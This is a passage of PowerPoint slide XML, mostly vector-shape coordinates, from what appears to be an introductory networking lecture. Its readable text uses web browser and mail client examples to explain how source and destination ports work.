                    <a:pt x="638848" y="215760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639229" y="215760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="636041" y="215442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620534" y="215442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617131" y="215760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617131" y="189064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="664565" y="189064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="664565" y="177253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604126" y="177253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604126" y="228993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="606767" y="228447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609930" y="227901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616661" y="226910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616000" y="226910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="621080" y="226555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629170" y="226555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="632917" y="226910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639610" y="228295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="642454" y="229514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="644804" y="231203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646899" y="232651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="648576" y="234569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="650938" y="239331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="651548" y="242239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="651548" y="249262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="651027" y="252387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="650062" y="254939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="649020" y="257784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="631469" y="268097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="623506" y="268097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="618642" y="267284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="608749" y="263994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604494" y="262026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="600760" y="259676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599808" y="259676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599808" y="273900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="603453" y="275551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="607606" y="276910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617766" y="279184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="623049" y="279781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634428" y="279781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="657580" y="268097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="658622" y="267068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="660971" y="263474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="664324" y="255066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="664375" y="254939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665238" y="250444"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="280035">
                  <a:moveTo>
                    <a:pt x="721334" y="61709"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="708990" y="32016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708990" y="58940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665822" y="58940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="682104" y="37960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695642" y="37960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700646" y="39789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="707275" y="47053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708939" y="52209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708990" y="58940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708990" y="32016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="707567" y="30480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699731" y="27508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="689559" y="27508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="655459" y="51130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="652932" y="67691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="653592" y="76504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683971" y="106083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684225" y="106083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="692721" y="106692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697623" y="106692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="702322" y="106083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711225" y="103644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715581" y="102158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="719848" y="100342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="719848" y="95631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="719848" y="86525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="719175" y="86525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="716978" y="88493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="713282" y="90500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="702894" y="94615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697712" y="95631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="688733" y="95631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="685177" y="95084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="678764" y="92913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675995" y="91313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673646" y="89154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671220" y="86956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669378" y="84251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="666521" y="77254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665822" y="73202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665822" y="68580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="721334" y="68580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="721334" y="61709"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="280035">
                  <a:moveTo>
                    <a:pt x="790206" y="30441"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="786612" y="29870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="775550" y="29870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="772896" y="30441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="765225" y="33820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760768" y="36690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="755738" y="40741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="755738" y="29870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743038" y="29870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743038" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="755738" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="755738" y="51460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759104" y="48704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762622" y="46469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="769899" y="43014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="773188" y="42252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="782116" y="42252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785660" y="42659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="787704" y="43014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="789393" y="43421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="790067" y="43421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="790067" y="42252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="790067" y="40741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="790067" y="30441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="790206" y="304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9" name="object 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C486248C-2A9B-26D9-28D2-75169EEB6B5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3206" y="2177417"/>
              <a:ext cx="626733" cy="692664"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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352C41F2-D501-4E08-9FB1-4542E9CD2AE0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3828161" y="2179078"/>
              <a:ext cx="3531870" cy="1788795"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3531870" h="1788795">
                  <a:moveTo>
                    <a:pt x="1010716" y="941628"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1009548" y="928128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1014501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1168" y="1028001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1010716" y="941628"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3531870" h="1788795">
                  <a:moveTo>
                    <a:pt x="3531362" y="1777974"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2435199" y="934567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3497808" y="10223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3488906" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420074" y="929754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2424519" y="934885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420391" y="940231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3523094" y="1788706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3531362" y="1777974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1" name="object 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBEDFAE0-F2A9-38BC-710F-B2CF77E36DA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1859" y="2516851"/>
              <a:ext cx="2107455" cy="1197818"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49D89134-E91F-8018-1DFA-303945DB7531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9" name="object 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D773D629-3269-61BD-434F-0F11F1F38A3A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76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7384582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B263974-C3E2-CCA1-BD37-089473648EBA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B8EC132-ADDC-57AE-761B-186DEDBDB413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Ports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Examples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C22A92D-2C29-0DE6-8332-E0EC2E1E4C23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ADCB9AB-ACF2-F68C-AF73-4982D1F4A94F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77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0FB9FB9-D78F-F4C7-8B71-3ABFC6A32434}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1154669"/>
            <a:ext cx="8077200" cy="32448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previous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example:</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469900" marR="5080" indent="-4572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All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communication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web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browser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web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have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3028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source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80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destination</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1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port.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  <a:buClr>
                <a:srgbClr val="252525"/>
              </a:buClr>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469900" marR="5461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All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communication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back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web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browser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have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80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source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3028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destination</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1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port.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35396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980599F-6182-3700-8AEC-B29C7CC0EF96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9215EBB-0D5D-AB80-3202-CD6F94EEBBF9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Ports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Examples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9D4ED5A-D4C3-7342-06F7-0AF06650426A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FC9FF0C-9C3A-7C09-DF1D-830989333C32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78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E5B0189-DC21-6EA2-E77C-64900AD49A54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1154669"/>
            <a:ext cx="7894320" cy="32448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Similarly,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mail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client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server:</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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All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communication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mail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client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have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1022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source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25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destination</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1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port.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  <a:buClr>
                <a:srgbClr val="252525"/>
              </a:buClr>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="9588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All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communication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back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mail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mail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client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have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25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source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1022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as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destination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port.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465571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6DBEDE0E-850F-E477-DB60-D8966A1AEEC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1446110" y="2972678"/>
            <a:ext cx="6271259" cy="1182624"/>
            <a:chOff x="1324355" y="2971800"/>
            <a:chExt cx="6271259" cy="1182624"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="40" name="object 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9389929-B729-5F01-1553-E28CA2F53BD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4355" y="3142487"/>
              <a:ext cx="1746504" cy="752868"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="object 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19BB9BA0-8613-0410-5987-36460D83248B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1371345" y="3177920"/>
              <a:ext cx="1649095" cy="647700"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1649095" h="647700">
                  <a:moveTo>
                    <a:pt x="0" y="647319"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1648714" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400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2" name="object 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CB75EA2-8049-58D1-AAD5-5CD46E0350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1963" y="3063239"/>
              <a:ext cx="1859280" cy="242316"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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2555B431-67A1-5A2A-B1DE-6FDD794F7FD1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3564889" y="3098292"/>
              <a:ext cx="1765935" cy="137160"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1765935" h="137160">
                  <a:moveTo>
                    <a:pt x="0" y="136906"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1765935" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400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4" name="object 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F13DE91-9960-B5EB-C419-0E642FC9B9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1427" y="2971800"/>
              <a:ext cx="1504187" cy="1182624"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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4291AD48-4398-E118-69E3-A1C4EA2FFD84}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6141084" y="3004057"/>
              <a:ext cx="1403985" cy="1080135"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1403984" h="1080135">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1403985" y="1079855"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400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5" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6D10BDD-09B8-867B-5CE4-02555484D306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Ports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Examples</a:t>
            </a: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B39ECDA8-A269-5F25-3FD9-ED00FA7A1A24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1300595"/>
            <a:ext cx="3623945" cy="129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...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while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‘B’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uses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8723.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070"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="277495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1C2C0A4D-F246-26DF-1A1B-B90420D6F74A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="797293" y="3487028"/>
            <a:ext cx="14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5A14D16A-37AA-D9AA-DFAA-F9B82204210F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7510849" y="4678831"/>
            <a:ext cx="555625" cy="105410"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="555625" h="105410">
                <a:moveTo>
                  <a:pt x="33248" y="2291"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="2291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="102569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13353" y="102569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13353" y="65190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33879" y="65190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39812" y="64327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49263" y="60870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53345" y="58277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57803" y="53810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13353" y="53810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13353" y="13739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59885" y="13739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57451" y="11112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50391" y="6399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46691" y="4816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38345" y="2796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33248" y="2291"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="105410">
                <a:moveTo>
                  <a:pt x="59885" y="13739"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="30766" y="13739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34263" y="14041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39789" y="15254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51744" y="35896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51315" y="38566"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29977" y="53810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57803" y="53810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59571" y="52037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61759" y="48747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64849" y="41159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65616" y="37040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65553" y="26466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64579" y="21934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60406" y="14300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59885" y="13739"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="105410">
                <a:moveTo>
                  <a:pt x="110684" y="25255"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="78276" y="48531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75924" y="64990"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76512" y="73698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103113" y="103992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110684" y="104657"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118200" y="103992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124914" y="101997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130829" y="98671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135947" y="94016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136140" y="93745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103872" y="93745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98598" y="91332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89007" y="55246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90902" y="48008"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98481" y="38532"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103827" y="36165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136113" y="36165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135947" y="35930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130829" y="31260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124914" y="27924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118200" y="25922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110684" y="25255"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="105410">
                <a:moveTo>
                  <a:pt x="136113" y="36165"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="117473" y="36165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122774" y="38532"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130398" y="48008"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132316" y="55246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132316" y="74508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130462" y="81438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130398" y="81679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122706" y="91332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117428" y="93745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136140" y="93745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145376" y="64990"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144787" y="56278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143021" y="48531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="140075" y="41748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136113" y="36165"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="105410">
                <a:moveTo>
                  <a:pt x="180135" y="27623"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="167481" y="27623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167481" y="102569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180135" y="102569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180135" y="49162"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183519" y="46425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187015" y="44190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194301" y="40733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197625" y="39971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214443" y="39971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214443" y="38456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180135" y="38456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180135" y="27623"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="105410">
                <a:moveTo>
                  <a:pt x="214443" y="39971"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="206504" y="39971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210045" y="40375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212015" y="40733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213767" y="41148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214443" y="41148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214443" y="39971"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="105410">
                <a:moveTo>
                  <a:pt x="210970" y="27623"/>
